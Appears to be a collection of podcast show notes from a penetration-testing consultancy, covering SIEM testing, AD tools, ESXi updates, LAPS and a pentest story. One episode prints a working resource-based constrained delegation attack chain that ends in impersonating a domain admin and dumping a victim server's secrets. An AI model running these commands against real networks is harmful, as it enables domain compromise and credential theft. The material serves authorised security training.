Today we're featuring a great interview with Matthew Warner, CTO and co-founder ofBlumira. You might remember Matt from such podcasts asthis one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11! Today, we talk about a cool report that Blumira put out called2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including: How do companies like Blumira (who we rely on to stay on top of threats) keeptheirteams on top of threats? Why open source detections are a great starting point - but not a magic bullet Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend? Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do youuseDigital Ocean for legit biz purposes? Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block? Common lateral movement tools/techniques Why honeypots rule!
In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for: Do we have creds to log onto his computer? How about his email accounts? Do we have usernames/passwords for retirement accounts, bank accounts, etc.? For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles? Can we get into his phone to get key info off of text messages and grab phone #s of key contacts? What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial? Do we haveredundancyin this plan, or is it all on paper in a file somewhere?
In today's episode we talk aboutPurple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in ourLight Pentest LITE pentest training laband did an informal compare-and-contrast of its detection capabilities versusPingCastle, which we talked about in depth inepisode #489.
Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before:cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking outthis article, which has you set the following setting in GPO: UnderComputer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security OptionssetInteractive logon: Number of previous logons to cacheto0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump,this articleI found this article to be super interesting.
Today we're sharing an updates toepisode #512where we ran Rapid7'sInsightIDRthrough a bunch of attacks: Active Directory enumeration viaSharpHound Password spraying throughRubeus Kerberoasting and ASREPRoasting viaRubeus Network protocol poisoning withInveigh. Looking for a free way to detect protocol poisoning? Check outCanaryPi. Hash dumping usingImpacket. I also talk about an interestingTwitter threadthat discusses the detection of hash dumping. Pass-the-hash attacks withCrackMapExec In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR
I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented byvideo: https://www.youtube.com/watch?v=0-XAO32LEPY Shortly after recording this video, I foundthis awesome articlewhich walks you through a different way to tackle these updates: List all upgrade profiles: esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml Grep for just the ones you want (in my case ESXi 7.x): esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0 Apply the one you want! esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0
Well friends, it has been a while since we talked about Microsoft's awesomeLocal Administrator Password Solution- specifically, the last time wasway back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in ourLight Pentest LITElab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)
Hey friends, a while back inepisode #505we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in onjustthe networks you're interested in and filter out a bunch of noisy events frombettercap in the process.
Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involvesresource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I foundthis blog from TrustedSecas well asthis article from LummelSecto be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out ourLight Pentest LITE: ebook Edition!
Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're usingIntercomto publish self-help/FAQarticlesfor 7MS.